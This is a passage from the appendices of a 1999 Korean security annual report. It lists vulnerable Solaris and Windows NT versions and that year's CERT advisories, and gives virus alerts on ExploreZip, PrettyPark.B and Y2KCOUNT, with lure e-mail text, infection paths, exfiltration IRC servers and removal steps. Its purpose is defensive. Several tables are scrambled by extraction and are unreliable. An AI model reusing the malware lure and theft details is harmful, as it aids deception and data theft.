2.7 su Solaris 2.5 and below rpc.statd SunOS 5.6, 5.5.1, 5.5, 5.4, and 5.3 ufsrestore Solaris 2.5, 2.5.1, 2.6(i386 only) WBEM Solaris WBEM 1.0 write Solaris 2.5.1, 2.6, 7 XNTPd Solaris 2.6,

266 G7. WindowsNT 패치사이트 : ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/ 취약점명취약한버전 Internet Information Server 4.0, IIS Reveals Source Code Site Server 3.0, Site Server Commerce 3.0 Internet Information Server 4.0, Site Server IIS Escape Char Parsing 3.0, Site Server Commerce 3.0 NT Workstation 4.0, NT Server 4.0 SysKey Keystream Reuse NT Server 4.0, Enterprise Edition NT Server 4.0, Terminal Server Edition QL 7.0 Denial of Server SQL Server 7.0 SQL 7.0 SA Password SQL Server 7.0 NT Workstation 4.0, NT Server 4.0 LSA DoS NT Server 4.0, Enterprise Edition NT Server 4.0, Terminal Server Edition NT Workstation 4.0, NT Server 4.0 NT DoS NT Server 4.0, Enterprise Edition NT Server 4.0, Terminal Server Edition NT Help File NT Server 4.0 IIS 4.0, Microsoft Site Server 3.0, IIS ISAPI Filter PlainText Leak Microsoft Site Server Commerce Edition 3.0 NT Spooler Overflows NT 4.0 Workstation, Server, Terminal Server Services.exe DoS NT 4.0 CMail Server DoS CMail STMP Server 2.4 NT 4.0 Workstation, NT 4.0 Server TCP/IP Sequence Number NT 4.0 Server, Enterprise Edition NT 4.0 Server, Terminal Server Edition Internet Information Server 4.0, Site Server Malformed IIS Header Request 3.0, DoS Site Server 3.0, Commerce Edition Commerce Internet Server 2.0 and 2.5 IIS Domain Blocking and FTP Internet Information Server 4.0 Access Terminal Server DoS NT 4.0, Terminal Server Edition

267 취약점명취약한버전 NT Workstation 4.0, NT Server 4.0 Malicious Dialer Entries Elevate NT Server 4.0, Enterprise Edition Privileges NT Server 4.0, Terminal Server Edition NT 4.0 Workstation, NT 4.0 Server CSRSS DoS Attack NT 4.0 Server, Enterprise Edition NT 4.0 Workstation, NT 4.0 Server Crashing NT's LSA NT 4.0 Server, Terminal Server Edition,4.0 Windows 2000 Beta 3 Internet Information Server 4.0, Peer Web.HTR Vulnerability in IIS Services NT Workstation 4.0, NT Server 4.0 RAS and RRAS Password NT Server, Enterprise Edition 4.0 NT Workstation : 4.0, 4.0 SP1, 4.0 SP2, 4.0 SP3, 4.0 SP4 RAS Buffrr Overflows NT Server : 4.0, 4.0 SP1, 4.0 SP2, 4.0 SP3, 4.0 SP4 NT Server, Enterprise Edition : 4.0, 4.0 SP4 NT Help System NT 4.0 ASP Bypasses IIS Settings IIS Web Servers with ASP support AdSamples Reveal ID and PSW Site Server 3.0 Viewing Files with IIS Internet Information Server 4.0 Case Sensitivity All Windows NT Versions NT Server and Workstation 4.0, Screensaver Windows 2000 Beta 1 and 2 SLMail Exposes NTFS Partitions SLMail v3.1 and 3.2 IIS 4.0 Allows Proxied Password Internet Information Server 4.0 Attacks NT Workstation : 3.5, 3.51, 4.0, 4.0 SP1, 4.0 SP2, 4.0 SP3, 4.0 SP4 Fi1e Mapping Object Cache NT Server : 3.5, 3.51, 4.0, 4.0 SP1, 4.0 SP2, 4.0 SP3, 4.0 SP4 NT Server, Enterprise Edition : 4.0, 4.0 SP4 Authentication Error NT 4.0 with Service Pack

268 부록 H. '99 해킹방지기술권고문현황 H1. CERTCC-KR 보안권고문 H2. 미국 CERT/CC 보안권고문 H3. 미국 CIAC 보안권고문 H4. 호주 AUSCERT 보안권고문

269 부록 H. '99 해킹방지기술권고문현황 H1. CERTCC-KR 보안권고문 참조사이트 : htto:// certcckr.htm1#1999 KA-99-1-tcp-denial-of-service TCP/IP 서비스거부취약점및대책 KA-99-2-SUN-automountd SUN automountd 취약점 KA-99-3-IE Frame Spoofing Frame Spoofing 취약점과대책 KA-99-4-Windows Network File SharingWindows 95/98 Network File Sharing 취약점과대책 KA-99-5-Cisco IOS Syslog Denial of Serviceg Cisco IOS Syslog 취약점및대책 KA-99-6-Linux PAM Linux PAM 취약점및대책 KA-99-7-Widespread DOS vulnerability nmap DOS 취약점및대책 KA-99-8-Netscape Frame Spoofing Netscape Frame Spoofing 취약점과대책 KA-99-9-Trojan Tcp Wrapper 트로이목마버전의 TCP Wrapper KA NT Password Appraiser NT Password Apprasiser 취약점및대책 KA CISCO IOS Remote Router Crash CISCO IOS Remote Router Crash KA BackWeb Polite Agent Protocol BackWeb Polite Agent Protocol 취약점과대책 KA SUN passwd KA Word 97 Template KA Trojan Horses KA mSQL ServerStats KA FTP-buffer overflows KA Sun man/catman KA Sun CDE KA SUN sdtcm_convert KA lsof buffer overflow KA Linux super buffer overflow KA IRIX X server path KA Cisco 7xx TCP and HTTP KA LDAP Buffer Overflow KA umapfs KA IIS 4.0 Proxied Password Attacks KA IE 4 Clipboard Contents KA Windows NT Screensaver KA Melissa-Macro-Virus KA CIH-Virus KA Cisco Input Access List Sun passwd 서비스거부취약점및대책워드 97 템플릿취약점및대책트로이목마취약점및대책 msql ServerStats 취약점과대책 FTP Buffer Overflows 취약점과대책 Sun man/catman 취약점및대책 Sun CDE 취약점및대책 sdtcm-convert 취약점및대책 lsof 버퍼오버플로우취약점및대책 super 버퍼오버플로우취약점및대책 IRIX X server path 취약점및대책 Cisco 7xx TCP 와 HTTP 취약점및대책 MS LDAP 버퍼오버플로우 umapfs 취약점및대책 IIS 4.0 패스워드취약점및대책 IE 4 Clipboard 취약점및대책 Windows NT Screensaver 취약점및대책 Melissa 매크로바이러스 CIH 바이러스 Cisco Input Access List 취약점및 Leakaqge with NAT 대책

270 KA HP sendmail DOS HP Sendmail DOS 취약점및대책 KA HP_ftp HP-UX ftp 취약점및대책 KA NetBSD_vfs-locking NetBSD vfs locking 취약점및대책 KA IIS 4.0 showcode.asp IIS 4.0 showcode.asp 취약점및대책 KA Crashing FTP Serv-U2.5 FTP Serv-U 2.5 취약점및대책 KA File_Viewers MS 파일검색기취약점및대책 KA Excel97_Virus Excel 97 바이러스및대책 KA NT4_help 윈도우즈 NT 4.0 도움말파일취약점및대책 KA IRIX-midikeys IRIX midikeys 취약점및대책 KA Solaris-libc 솔라리스 libc 취약점및대책 KA Linux-INN 레드헷리눅스 6.0 INN 취약점및대책 KA NetBSD_ARP NetBSD ARP 테이블취약점및대책 KA MS_Access MS Access 취약점및대책 KA Linux_pop2d pop2d 취약점및대책 KA RAS Buffer Overflow RAS 버퍼오버플로우취약점및대책 KA NT Help System NT Help System 취약점및대책 KA Viewing Files with IIS IIS 취약점및대책 KA IIS Buffer Overflow IIS 버퍼오버플로우취약점및대책 KA cmsd Overflow Calendar Manager 버퍼오버플로우취약점및대책 KA VMWare Overflow VMWare 버퍼오버플로우취약점및대책 KA Accelerated-X Overflow Accelerated-X X서버취약점및대책 KA RaQ2 Server Default RaQ2 Server의안전치못한 Default configuration Configuration KA Using the Domain Name 도메인네임시스템을이용한 System DoS KA Array Services default configuration Array 서비스의기본설정취약성 KA WindowsNT Terminal servers Windows NT 터미널서버 DOS Vulnerability 서비스거부공격취약점 KA Microsoft "Encapsulated SMTP Microsoft "Encapsulated SMTP Address" Vulnerability Address" 취약점및대책 KA AIX pdnsd buffer overflow IBM AIX pdnsd 버퍼오버플로우취약점및대책 KA MS ODBC MS ODBC 취약점및대책 KA IBM AIX Vulnerability AIX ptrace() 시스템콜의서비스거부공격취약점 KA Buffer Overflow in Netscape Enterprise and FastTrack Web Servers KA Tiger vulnerability KA fts library routine KA amd buffer overflow KA HP CDE ttsession KA AIX named-xfer security problem KA Remote buffer overflow In KA Microsoft IE5 IFRAME vulnerability Netscape Enterprise 와 FastTrack Web Enterprise and FastTrack Web Servers Servers의버퍼오버플로우취약점및대책 Tiger 취약점및대책 fts library routine 버퍼오버플로우 vulnerability amd 원격버퍼오버플로우취약점및 vulnerability 대책 HP CDE ttsession 취약점및대책 AIX named-xfer 보안취약점및대책 Ftpfpd daemon 취약점및대책 Microsoft IE5 IFRAME 취약점및대책

271 H2. 미국 CERT/CC 보안권고문 참조사이트 : CA-99-0l Trojan TCP Wrappers CA Trojan Horses CA FTP Buffer Overflows CA Melissa Macro Virus CA Vulnerability in statd exposes vulnerability in automountd CA ExploreZip Trojan Horse Program CA IIS Buffer Overflow CA Buffer overflow vulnerability in rpc.cmsd CA Array Services default configuration CA Insecure Default Configuration on RaQ2 Servers CA-99-1l Four Vulnerabilities in the Common Desktop Environment CA Buffer Overflow in amd CA Multiple Vulnerabilities in WU-FTPD CA Multiple Vulnerabilities in BIND CA Buffer Overflows in SSH daemon and RSAREF2 Library CA Buffer Overflow in Sun Solstice AdminSuite CA Denial-of-Service Tools H3. 미국 CIAC 보안권고문 참조사이트 : J-001 : Windows NT RPC Spoofing Denial of Service Vulnerability J-002 : SGI IRIX Mail(1)/mailx(1) Security Vulnerabilities J-003 : SGI IRIX On-Line Customer Registration Vulnerabilities J-004 : SunOS ftp client Vulnerability J-005 : SGI IRIX at(1) Vulnerability J-006 : NFS mountd Buffer Overflow Vulnerability J-007 : HP OpenView Omniback II Vulnerability J-008 : FreeBSD TCP RST Denial of Service Vulnerability J-009 : Cisco IOS Command History Release at Login Prompt J-010 : SGI Buffer Overflow Vulnerabilities ( xterm(1), Xaw library) J-011 : Microsoft IE 4.01 Untrusted Scripted Paste (Cuartango Vul.) J-012 : SGI IRIX routed(1m) Vulnerability J-013 : SGI IRIX autofsd Vulnerability J-014 : IBM AIX automountd Vulnerability J-015 : HP SharedX Denial-of-Service Vulnerability

272 J-016 : Cisco IOS DFS Access List Leakage Vulnerabilities J-017 : HP-UX vacation Security Vulnerability J-018 : HTML Viruses

273 J-019 : Intelligent Peripherals Create Security Risk J-020 : SGI IRIX fcagent daemon Vulnerability J-021 : Sun Solaris Vulnerabilities ( dtmail, passwd ) J-022 : HP-UX Vulnerabilities (snmp, sendmail, remote network commands) J-023 : Cisco IOS Syslog Denial-of-Service Vulnerability J-024 : Windows NT Remote Explorer J-025 : W97M.Footprint Macro Virus Detected J-026 : HP-UX rpc.pcnfsd Vulnerability J-027 : Digital Unix Vulnerabilities ( at, inc ) J-028 : Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE) J-029 : Buffer Overflows in Various FTP Servers J-030 : Microsoft BackOffice Vulnerability J-031 : Debian Linux "Super" package Buffer Overflow J-032 : Windows Backdoors Update II: J-033 : SGI X server font path vulnerability J-034 : Cisco 7xx TCP and HTTP Vulnerabilities J-035 : Linux Blind TCP Spoofing J-036 : LDAP Buffer overflow against Microsoft Directory Services J-037 : W97M.Melissa Word Macro Virus J-038 : HP-UX Vulnerabilities (hpterm, ftp) J-039 : HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DESMS) J-040 : HP-UX Security Vulnerability in sendmail J-041 : Cisco IOS(R) Software Input Access List Leakage with NAT J-042 : Web Security J-043 : Creating Login Banners J-044 : Tru64/Digital UNIX (dtlogin) Security Vulnerability J-045 : Vulnerability in statd exposes vulnerability in automountd J-046 : HP-UX VVOS NES Vulnerability J-047 : The ExploreZip Worm J-048 : Malformed HTR Request Vulnerability J-049 : Windows NT, Two Denial-of-Service Vulnerabilities(Malformed LSA Request and CSRSS Worker Thread Exhaustion) J-050 : HP-UX Visualize Conference Vulnerability J-051 : Calendar Manager Service Buffer Overflow Vulnerability J-052 : SGI arrayd default security configuration J-053 : HP Current Directory Vulnerability J-054 : Unauthorized Access to IIS Servers through ODBC Data Access with RDS J-055 : IBM AIX Vulnerability in ptrace() system call J-056 : Microsoft "Encapsulated SMTP Address" Vulnerability J-057 : Windows NT(r) Terminal Servers DOS Vulnerability J-058 : Microsoft "Malformed HTTP Request Header" Vulnerability

274 J-059 : IBM AIX (pdnsd) Buffer Overflow Vulnerability J-060 : Microsoft Office ODBC Vulnerabilities J-061 : Lotus Notes Domino Server Denial of Service Attacks J-062 : Netscape Enterprise and FastTrack Web Servers Buffer Overflow J-063 : Domain Name System (DNS) Denial of Service (DoS) Attacks J-064 : ActiveX Controls, Scriptlet.typlib & Eyedog, Vulnerabilities J-065 : Wu-ftpd Vulnerability J-066 : FreeBSD File Flags and Man-In-The-Middle Attack J-067 : Profiling Across FreeBSD Exec Calls J-068 : FreeBSD Vulnerabilities in wu-ftpd and proftpd J-069 : SunOS LC_MESSAGES Environment Variable Vulnerability J-070 : Microsoft Windows 95 and 98 Telnet Client Vulnerability J-071 : Buffer Overflow Vulnerability in amd J-072 : IBM AIX Buffer Overflow Vulnerability H4. 호주 AUSCERT 보안권고문 참조사이트 : AusCERT Advisory AA wu-ftpd/beroftpd MAPPING_CHDIR Vulnerability AusCERT Advisory AA Multiple Vulnerabilities in wu-ftpd based daemons AusCERT Advisory AL "sscan" scanning too1 AusCERT Advisory AL Oracle oratclsh vulnerability AusCERT Advisory AL June 18 DoS threat AusCERT Advisory AL Denial of Service attacks using the Domain Name System (DNS) AusCERT Advisory AL Buffer overflow in qpopper AusCERT Advisory AL Buffer Overflow in RSAREF2 and SSH

275 부록 I. '99 바이러스예보및경보현황

276 부록 I. '99 바이러스예보및경보현황 한국정보보호센터컴퓨터바이러스전담반에서는 '99년 6월부터신종바이러스에대한신속한분석과경보를통한국내피해예방을위하여주간예보 (20회, 107종 ), 월간예보 (6 회, 64종 ), 긴급예보 (25회) 배포하는등의대국민바이러스예방활동을하였다. 그리고컴퓨터바이러스신고센터를운영하여접수된신종바이러스샘플 6종에대한분석과함께예방활동을하였으며, 특히 W32/FIX2001이나 W32/NewApt의경우백신업체에샘플바이러스를전달하여백신개발을유도하였다. 컴퓨터바이러스전담반은 '99년 6월에구성되었기때문에 6월이후에출현한바이러스에대한사전예보가이루어졌으며, 6월이전의 W97M/Melissa, CIH 등의바이러스에대한대응은침해사고대응지원팀 (CERTCC-KR) 에서이루어졌다. 최근문제가되고있는트로이목마프로그램이나해킹응용바이러스에경우, 침해사고대응지원팀 (CERTCC-KR) 의기술력과사전지식을바탕으로보다심도있는연구와대응책을세워나가고있다. 첨부자료는 '99년주요국내출현바이러스에대한경보자료로기술적으로새로운요소나악성인파괴력을포함한악성바이러스인 Worm/ExploreZip, Worm/PrettyPark.B, VBS/BubbleBoy, W32/Fix, Y2KCount, Worm/MyPics, W95/Babylonia, W32/NewApt, W95/Love 등의바이러스에대한것이다. 또한 Y2K 기간중에국외에서발견된신종바이러스에대한긴급경보자료도참고로첨부하였다. [ 표 J-1] 은 '99년에컴퓨터바이러스전담반의주요바이러스 25종에대한긴급경보와대응현황을보여주는자료이다

277 [ 표 l-1] '99 년주요바이러스와대응현황 바이러스명 감염형태와특징 피해증상 대응날짜 을통한파일첨부전파 Worm/Happy99 기능다른파일에감염시키지않음 폭죽이터지는동영상출력 '99. 2 워드 97/2000 용매크로바이 W97M/Melissa 러스사용자가작성중인기밀워 ' 로사용자가작성중인드문서유출가능 파일첨부 (WIN95/PE) CIH Worm/ExploreZi p Back Orifice 2000 W97M/JulyKille r Win32/Kriz Toadie W97M/Thus.A Worm/PrettyPar k.b Cholera Y2KCOUNT VBS/FreeLink EcoKys 일반파일바이러스로 EXE 파일감염상주형, 겹쳐쓰기형 에 Z1PPED_FILES.EXE 파일첨부 윈도우트로이목마프로그램윈도우 95/98/NT 에서동작 워드 97 매크로바이러스 에감염파일이첨부되어전파 원도우파일바이러스 EXE, DLL 감염기생형메모리상주 IRC를통한자체전파기능실행파일에감염워드 97 매크로바이러스 에감염파일이첨부되어전파 을통한자체전파기능 에 PrettyPark.exe 파일첨부 을통한자체전파기능 에 setup.exe 파일첨부 Y2K 축하프로그램가장바이러스 을통한자체전파기능 에 Y2KCOUNT.EXE 파일첨부 을통한자체전파기능 에 LINKS.VBS 파일첨부 IRC를통한자체전파기능 4월26일에플래시메모리 BIOS 내용, 하드디스크데이터파괴 파일확장자가 DOC, XLS, PPT, ASM, C, CPP 파일의크기를 0바이트로만듬 '99. 4 ' 원격시스템관리, 정보유출 ' 기능 "A wake up call for the generation" 내용의대화상자 ' 9 9. 출력 7.16 C 드라이브데이터삭제 12윌25일에플래시메모리 ' 9 9. BIOS 내용, 하드디스크데이 8.18 터파괴 바이너리사이즈증가시스템속도저하 12 욀 13 일에감염된파일을열면 C 드라이브파일삭제 감염시사용자와시스템정보가바이러스제작자에게유출됨 서버정지실행파일손상, 생산성저하 ' ' ' ' 감염시사용자와시스템정보 ' 9 9. 가바이러스제작자에게유출 9.29 됨 특별한피해증상은없으며시스템에파일을생성시킴 mirc등의설정스크립트변경 ' 의첨부파일로전파사용자 KeyLog를저장하여 ' 에 FROM.ZIP 파일첨제작자에게파일을 FTP로보 부냄

278 BubbleBoy W97/Prilissa (Melissa.w) W32/Fix(Fix200 1) W32/MyPics W95/Babylonia Win32/ExploreZi p.worm.pak.b W32/NewApt Win95/Love VBS/TUNE Trojan/Y2Kaos 을읽는것만으로도시스템감염 Microsoft Internet Explore 5의보안취약점특별한증상없음 (scriptlet.typelib/ Eyedog) 이용 Melissa 바이러스의변종기밀워드문서유출가능 12윌 25일에하드디스크데이워드 97 용매크로바이러스작성중인파일첨부하여터파괴 E-Mai1로보냄워드문서에임의의모양겹쳐짐 Y2K 해결프로그램가장바이러스웜을첨부하여 을보냄다음부팅시하드디스크데이터삭제 에 FIX2001.EXE 파일첨부 Y2K 문제가상 Simulation 바 2000년 1윌 1일이후부팅시이러스 CMOS Checksum Invalid" 라웜을첨부하여 을보냄는메시지출력, 시스템의하 에 PlCS4YOU.EXE 파드디스크일첨부드라이브포맷 Y2K 문제해결가장바이러스데이터의손상과부팅시메자체 Plugin에의한업데이트시지출력기능 mirc등의설정스크립트변 IRC로 2KBug-MircFix.exe 파경하여 IRC 채널에사용자들일전파감염 을통한자체전파기능 에 FILE_ZIPPUTI.EXE 파일첨부 파일확장자가 DOC, XLS, PPT, ASM, C, CPP 파일의크기를 0 바이트로만듬 Y2K 축하프로그램가장바이러스특정사이트로의 ping-bomb" 공격이나, 전화 baby.exe, bboy.exe, boss.exe 등의파일을임의적으로첨부접속등으로네트워크트래픽하여전파증가 겹쳐쓰기, 메모리상주형파일바이러스윈도우 95/98 에서동작 이후매월 1 일음악연주, 시스템정지바이러스내부에문자열포함 E-Mai1을통한자체전파기능특별한피해증상은없으며 에 TUNE.VBS 파일첨시스템에파일을생성시킴, mirc등의설정스크립트변부 IRC를통한자체전파기능경 ' ' ' ' ' ' ' ' ' Y2K 문제가상 Simulation 바 2000년 7윌 4일이후에파일이러스삭제 2000년 1윌 1일이후에는시 ' Y2K 관련신종바이러스 ( 트로이목마 ) 스템날짜를 2001년 1. 1로시스템날짜를변경 Trojan/XTCP 신종바이러스 ( 트로이목마 ) W32/MyPics Y2K 문제가상 Simulation 바이러스웜을첨부하여 을보냄 에 P1CS4YOU.EXE 파일첨부 원격시스템관리, 정보유출기능 2000 년 1 월 1 일이후부팅시 CMOS Checksum Invalid" 라는메시지출력, 시스템의하드디스크드라이브포맷 ' ' ( 재경보 )

279 바이러스명 [ 표 1-2] Y2K 관련신종컴퓨터바이러스경보현황 발견일자 W95/Esmeralda 감염형태와특징 윈도우 (Win95/98) 메모리상주형바이러스 W95/Spaces 윈도우파일바이러스 W97M/Armagido n.a 매크로바이러스 Word 97 문서감염 PWSteal.Trojan 윈도우트로이목마 Zelu Inst W97M/Chantal.B Zoo Feliz VBS/Lucky JS/The Fly W97M/BackHan d.a W97M/Vale W32/Crypto 피해증상 피해정도 특별한피해증상없음낮음 6 월 1 일에 master boot record (MBR) 를실행할수없는코드를덮어씀, MBR 이복구되지않으면부팅이되지않음. 5읠 8일에감염시스템에파일을생성시키고, cursor의아이콘모양을변경시킴감염시스템의 Login 이름과패스워드를임의의메일주소로보냄 MS-DOS 트로이목마가상 Y2K 점검프로그램실행 Y2K 점검프로그램후하드디스크파괴가장 MS-DOS 트로이목마 매크로바이러스 Word 97 문서감염 윈도우 Joke 프로그램 2000년 1월 1일에시스템을파괴하는바이러스가장 ( 실제피해를주는것은없음 ) 2000년 1윌 1일에하드디스크데이터파괴 음란한내용을슬라이드로보여줌 ( 실제피해를주는것은없음 ) 높음 낮음 낮음 높음 낮음 높음 낮음 레지스트리내용을변조되었다는윈도우트로이목마가짜메시지창출력 FELIX.EXE 파일로높음메시지창을무시하면시스템이전파자동 shutdown되며데이터손상메시지를출력하고임의의웹사 VBS 바이러스낮음이트를화면에보여줌 JavaScript로만들어진 OUTLOOK의주소록을모든사웜바이러스용자에게감염파일전파, "THE_FLY.CHM" 파 mirc, Pirch98을통해감염파낮음일첨부된 E-메일전일전송송 sent 메일박스삭제 매크로바이러스 Word 97 문서감염 매크로바이러스 Word 97 문서감염 mirc 를통해파일전파 윈도우메모리상주 polymorphic 바이러스 매달 13 일에문서파일을암호화저장하고, 메시지창을출력 2000 년 1 윌 1 일이후에시스템날짜를 80 년 1 윌 1 일로설정시킴 5 윌 9 일, 9 월 25 일, 10 월 25 일,1 윌 1 일에브라질정부에대한정치적내용의메시지창을출력 낮음 낮음 antivirus 백신프로그램의다음주요파일을찾아삭제함 AVP.CRC, IVP.NTZ, 낮음 A N T I - V I R. D A T, CHKLIST.MS, CHKLlST.CPS

280

281 "Worm/ExploreZip 컴퓨터바이러스긴급경보 " 1. 개요이바이러스의피해사례는 ' 일에유입되어총 79건피해사례접수되었으며, 미국의경우보잉사, PriceWaterhouseCoopers 등 20개기업의컴퓨터시스템이마비되었다. 2. 감염특성 Worm/ExploreZip 바이러스는웜바이러스의일종인 Melissa바이러스와비슷하다. 하지만, Melissa바이러스와는같지않고 Zipped_Files worm은위험한폭발력을지니고있다. 전파방법은이메일을통하여전파하지만, 종전것과는차이점이있다. 이바이러스는 Microsoft Outlook에의해받은메시지를읽으면 Outlook의주소록을참조하여주소록의다른사용자들에게자동적으로답장을보낸다. 그내용은다음과같다. From : user_of_the_pc Subject : RE : subject_of_the_original_message To : sender_of_the_original_message Hi sender_of_the_original_message! I received your and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. Sincerely user_of_the_pc Attachment : zipped_files.exe 만약당신이이런메시지를받는다면, zipped_files.exe파일은절대열어서는안된다

282 이것은마치압축된 winzip 파일처럼보이지만, 실제는아니다. 만약그것을압축해제하려고하면, winzip 에러메시지가윈도우창에보여질것이고이바이러스는 Outlook을통하여좀더많은사용자들에게자기자신을퍼트릴것이다. 윈도우에보여지는에러메시지는다음과같다. Cannot open file : it does not appear to be a valid archive. If this file is part of a ZIP format backup set, insert the last disk of the backup set and try again. Please press Fl for help. The worm copies itself to two files: \WINDOWS\_SETUP.EXE \WINDOWS\SYSTEM\EXPLORE.EXE 그것은또한 WIN.INI를변형시켜서 Window를매새로시작할때마다앞의파일들중하나를취해실행시킨다. 이바이러스는 window 95, 98, NT하에서작동한다. window NT 하에서이바이러스는또한 WIN.INI 파일을무시하는것처럼 Registry를변형시킨다. 이바이러스는컴퓨터를실행할때지역하드드라이브나네트워크드라이브의여러지역에있는파일을자름으로써 0바이트를만들고그것들을쓸모없게만들어버린다. 밑에나열하는파일형식이영향을받는다..DOC - Microsoft Word documents.xls - Microsoft Excel spreadsheets.ppt - Microsoft PowerPoint presentations.asm - Assembler source files.cpp - C++ source files.c - C source files.h - C header files 하나의바이러스는회사네트워크안의한대의컴퓨터에만감염시킨다. 그바이러스는그네트워크안의다른윈도우를시스템으로사용하는워크스테이션을찾기시작할것이다

283 만약, 다른사용자가이컴퓨터에그에게주어진디렉토리를가지고있다면, 이바이러스는네트워크를통하여그컴퓨터도감염시키려고할것이다. 이것은당신이당신의이메일이대하여조심하고, 부착파일을열지않고, 또한완전히이메일사용을중지했다하더라도 ZippedFiles worm 바이러스에당신의컴퓨터가감염될수있다는것을의미한다. 당신이그감염사실을인지하지못할지라도당신의컴퓨터는자동적으로그뒤에따른모든이메일에대하여자동적으로답장하기시작할것이다. 그답장은감염된부착파일을포함하고있고, 더나아가이바이러스를퍼트릴것이다. 게다가이바이러스는지역드라이브와네트워크드라이브에있는파일을덮어쓰기시작할것이다. 회사의네트워크를통하여그바이러스를받기위해서는당신의컴퓨터가반드시 window 95나 98시스템을사용하여야하고시스템드라이브나, window directory가완전접속에의한다른사용자들에게공유되어야한다. 이공유된드라이브는바이러스를퍼트리기위해감염된시스템을정복하려하지않고, 네트워크상의공유된사용가능한모든드라이브를이바이러스는탐색할것이다. 이결과, windows는다른사용자들에게사용을위하여드라이브를공유하지못할것이다. 그러나많은사용자들이그들의파일을다른경쟁자들에게쉽게접속될것이다. Window95/98 시스템하에서이바이러스는치료를어렵게하기위해모호한기술을사용한다. 먼저바이러스자신을두개의파일에복제한후 EXOLORE.EXE를실행시키기위하여 WIN.INI를수정한다. 재부팅후 EXOLORE.EXE로부터이바이러스는실행되어전번과는다르게 run_setup.exe를실행시켜 WIN.INI를수정한다. 이바이러스는다시재부팅을한후다시 EXOLORE.EXE를실행시켜 WIN.INI를변형시킬것이다. 좀더많은정보를필요로한다면 Global ZippedFiles Worm Information Center( 사이트를참고하기바란다

284 "PrettyPark.B 컴퓨터바이러스긴급경보 " 1. 개요국내에 PrettyPark.B이란컴퓨터바이러스가빠르게확산되고있어사용자들의주의가요구된다. 이바이러스는전자우편으로퍼지는 Happy99와유사한인터넷웜 (worm) 형태이다. PrettyPark.Worm, TROJ_PRETTY_PARK 등으로도불리고있는이바이러스는 1999년 6월유럽에서최초보고되었으며, 프랑스의스팸메일을통해전파되어프랑스에서제작된것으로추측되고있다. 국내에는 1999년 8월말홍성한씨에의해처음발견되었으며, 국내에발견된것은원형이아닌변종인 PrettyPark.B로원형과증상은동일하다. 원형은아직발견되지않았으며, 웜샘플의파일크기는 37,376 바이트로윈도우실행파일압축프로그램인 WWPack32로압축되어있어진단, 분석을어렵게한다. 이웜의감염특성을살펴보면 30분에한번씩인터넷주소북파일을열어리스트에있는사용자에게 "C;\CoolProgs\PrettyPark.exe" 이란파일명을갖는파일을첨부하여전자우편을통해전송시킨다. 또한사용자의컴퓨터이름, Emai1 주소, 사용자비밀번호등의여러정보를 IRC 서버로보내웜제작자가다양한정보를수집할수있게한다. 이정보를이용하여웜제작자가시스템에불법으로침입하거나정보시스템공격을할수있어컴퓨터바이러스와해킹기법이결합된신종컴퓨터바이러스로서감염성이매우높고웜으로인한시스템에직접적인피해를입히지는않으나, 웜제작자에게시스템정보를유출시킴으로서 2차적인해킹의위험성을내포할수있으므로, 이에대한각별한주의가요구된다. 2. 바이러스감염증상 1 감염된웜프로그램을실행하면메모리상주여부를검사한후상주하지않은경우, 시스템폴더에 FILES32.VXD 파일을만들고레지스트리에윈도우가실행될때마다실행되도록레지스트값을변경한다. 또한레지스트리엔트리값을변경하여모든 EXE 파일이실행될때마다 FILES32.VXD 파일을실행시킨다. 2 PrettyPark.B는윈도우95/98/NT에서동작을하도록설계되어있으며 PE 포맷을가진 PrettyPark.exe 이름을가지고있다

285 또한 WIN32_Worm.PrettyPrak의제작자는 CIH 바이러스에감염되지않도록설계를하였으며, WIN32_Worm.PrettyPark의파일크기를줄이기위하여 WWPACK32 프로그램을사용하여실행압축하였다. 하지만실행압축을해제하게되면다음과같은문자열들을볼수있다.(IRC 서버정보 ) irc.twiny.net irc.stealth.net irc.grolier.net irc.club-internet.fr ircnet.irc.aol.com irc.emn.fr irc.anet.com irc.insat.com irc.ncal.verio.net irc.cifnet.com irc.skybel.net irc.eurecom.fr irc.easynet.co.uk 3 FILES32.VXD 파일은실제 VXD 파일이아닌 PrettyPark.exe 파일을복사해둔것이며, 이웜은 IRC 채널을통해 computer name, product name, product identifier, product key, registered owner, registered organization, system root path, version, version number, ICQ identification numbers, ICQ nicknames, victims address, and Dial Up Networking username, passwords 등을제작자에게보내게된다. 3. 예방및치료방법 1 제목이 c:\coolprogs\pretty park.exe 이고 Pretty Park.exe라는 37KByte 짜리실행화일이첨부된메일을받으면삭제한다. 2 동일한 Reproduce하는것이외에, c:\windows\system아래에 files32.vxd 화일을한다. 문제는이화일을만약없애고싶어도 windows가수행중에는이화일이 lock되어없앨수가없다. 없앨경우 windows가정상적으로수행되지못하게된다. 3 감염되었을때의해결책은아래와같다. 먼저, windows밑에있는 Regedit.exe를실행하여프레임에있는 HKEY_LOCAL_MACHINE/Software/CLASSES/exefile/shell/open/command를확인한뒤기본값을두번클릭하시고이름이해당하는데이터에서 Files32.vxd %1 %* 를 %1 %* 로바꾼다. 그리고난뒤 Dos로다시부팅시켜서 windows\system 밑의 files32.vxd를지우면제거된다

286 4 국내백신업체들은이바이러스의탐지및치료를위한엔진을추가시켰으므로사용자들은최신백신의업데이트하여진단하여야할것이다

287 "Y2KCOUNT 컴퓨터바이러스긴급경보 " 1. 개요최근 "Y2KCOUNT" 라는웜바이러스가빠르게확산되고있어사용자들의주의가요구된다. 이바이러스는 Mellisa 바이러스와같은계열의 로자신을전파시키는웜의형태와사용자정보를바이러스제작자에게보내는기능을갖는 Toadie 바이러스와같은 Spy형웜바이러스이다. 이바이러스는마이크로소프트사에서보낸 Y2K를해결해주는프로그램인것처럼가장한 Y2KCOUNT.EXE 파일이첨부된 을통해자신을전파시킨다. 이첨부된파일을사용자가열게되고 Self-Extracting 파일이자동으로실행되어주요시스템파일을감염시키고다시사용자의주소록 (Outlook Express의경우 ) 을참조하여메일을자동으로보내바이러스를전파한다. 이웜바이러스는감염된사용자의 Internet과 Network 트래픽을감시하여 login 이름, 사용자이름, 패스워드등의정보를제작자에게보내기위한목적으로만들어졌다. 현재까지 Y2K 바이러스는국내에서신고된사례가없으나주소록을참조하여 로자신을보낼수있는기능을가지고있기때문에국내에도전파되어피해가확산될우려가있다. 2. 바이러스감염증상 Y2K 바이러스가보내는 E-mai1 메일은다음과같이 Microsoft사가사용자들에게보내는친절한내용으로되어있기때문에사용자들은의심없이첨부파일을실행시킬우려가있다

